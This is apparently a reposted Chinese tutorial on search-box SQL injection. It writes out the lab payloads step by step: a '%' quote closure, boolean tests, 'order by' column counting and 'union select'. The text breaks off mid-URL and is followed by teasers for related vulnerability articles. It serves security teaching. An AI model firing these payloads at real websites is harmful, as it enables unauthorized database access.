【漏洞挖掘】——101、搜索型注入深入刨析

时间：2024-06-21 15:01:51浏览次数：12

标签：search php http 刨析 192.168 content 漏洞 sql 101

基本介绍

网站为了用户便于搜索网站中的资源往往会加入搜索功能，如果底层的代码忽略了对搜索变量的过滤，则有可能会造成了搜索型注入漏洞(又称文本框注入)，对于常见的搜索框而言，后台常用的SQL语句如下所示，在这里参数如果未经过滤直接拼接到SQL语句中则存在注入，注入方法类似于字符型注入，不过在这里我们需要闭合的符合就变成了"%"，其余的基本上一致

select * from member where username like '%input%'

注入流程

确定注入

http://192.168.244.128/sql_search.php?content= #正常页面

http://192.168.244.128/sql_search.php?content=%' and 1=1 # #正常页面

http://192.168.244.128/sql_search.php?content=%' and 1=2 # #不正常显示

猜解字段

http://192.168.244.128/sql_search.php?content=%' order by 3 # #正常显示

http://192.168.244.128/sql_search.php?content=%' order by 4 # #不正常显示

确定回显位

http://192.168.244.128/sql_search.php?content=-1%' union select 1,2,3 #

查询库用户名

http://192.168.244

标签：search,php,http,刨析,192.168,content,漏洞,sql,101
From： https://blog.csdn.net/Fly_hps/article/details/139858987

【漏洞挖掘】——102、Blind注入类型深入刨析(上)
基本介绍BlindInjection(即盲注)，当SQL语句执行成功或失败不会给出明确的回显信息或者只有一个提示类的信息，类似于true\false时，此时可以考虑盲注，常见的盲注有以下几种：基于布尔的盲注基于时间的盲注布尔盲注适用场景适用于对于sql语句执行成功或失败各有一个提示结果，例......
【漏洞挖掘】——103、Blind注入类型深入刨析(中)
时间盲注使用场景没有True/False，也没有任何错误提示类信息，在这种情况下可以考虑通过时间线的长短来判断是否存在SQL注入，即基于时间的盲注！函数简介sleep()：用于延迟IF(Condition,A,B)：当Condition为TRUE时，返回A；当Condition为FALSE时，返回BBENCHMARK(count,expr)：重复count......
【黑客工具】漏洞扫描之Nessus使用教程（超详细）_nessus扫描
Nessus简介Nessus是十分强大的漏洞扫描器，内含最新的漏洞数据库，检测速度快，准确性高。下载地址：DownloadTenableNessus|Tenable®1.点击"ConnentviaSSL"2.选择"NessusEssentials"版本3.填写注册信息，然后点击"Email",nessus会给你发送一封邮件，包含code。4.填写c......
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
1.问题描述SSL/TLS协议信息泄露漏洞(CVE-2016-2183)TLS是安全传输层协议，用于在两个通信应用程序之间提供保密性和数据完整性。TLS,SSH,IPSec协商及其他产品中使用的DES及TripleDES密码存在大约四十亿块的生日界，这可使远程攻击者通过Sweet32攻击，获取纯文本数据。2.问题解决......
用友Ufida ELTextFile-任意文件读取漏洞
0x01阅读须知技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使......
XWiki DatabaseSearch接口处存在RCE漏洞
0x01阅读须知技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用......
发现漏洞先吃再报？加密安全独角兽CertiK与交易所Kraken公开撕逼
CertiK在Kraken发现了一系列严重漏洞，源自Kraken最近的用户体验（UX）变化。该变化会在客户资产结算前立即为客户账户记账，并允许客户实时交易加密货币市场，但Kraken暂未对这种特定攻击向量进行充分测试。漏洞允许恶意攻击者在未完全完成存款的情况下发起存款操作，并在其账户中收到......
全网最强泛微漏洞综合利用工具
请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。如有侵权烦请告知，我们会立即删除并致歉。谢谢！01前言在攻防演练中，泛微一直是红队攻击的重点目标之一，红队通常需要快速......
Redis漏洞原理
Redis漏洞原理Redis简单介绍Redis是一款内存高速缓存的数据库，是一款K-V型数据库，它的所有键值都是用字典来存储的。其中它的value支持多种数据类型，包括String、List、Set、Zset和Hash。‍Redis未授权访问漏洞介绍利用条件Redis默认情况下绑定在127.0.0.1:6379，在没有进......
从零开始学Web安全，文件包含漏洞详解
从零开始学Web安全，文件包含漏洞详解大家好，我是[小羽]，一个对网络安全充满热情的小白。今天，我将与大家分享我的网络安全中的Web安全学习笔记什么是文件包含漏洞？，这里很详细的介绍了Sql注入的各种类型防御的方法。靶场：dvwa,pikachu服务器：centos7数据库：mysql5.7php：8.0nginx：1.......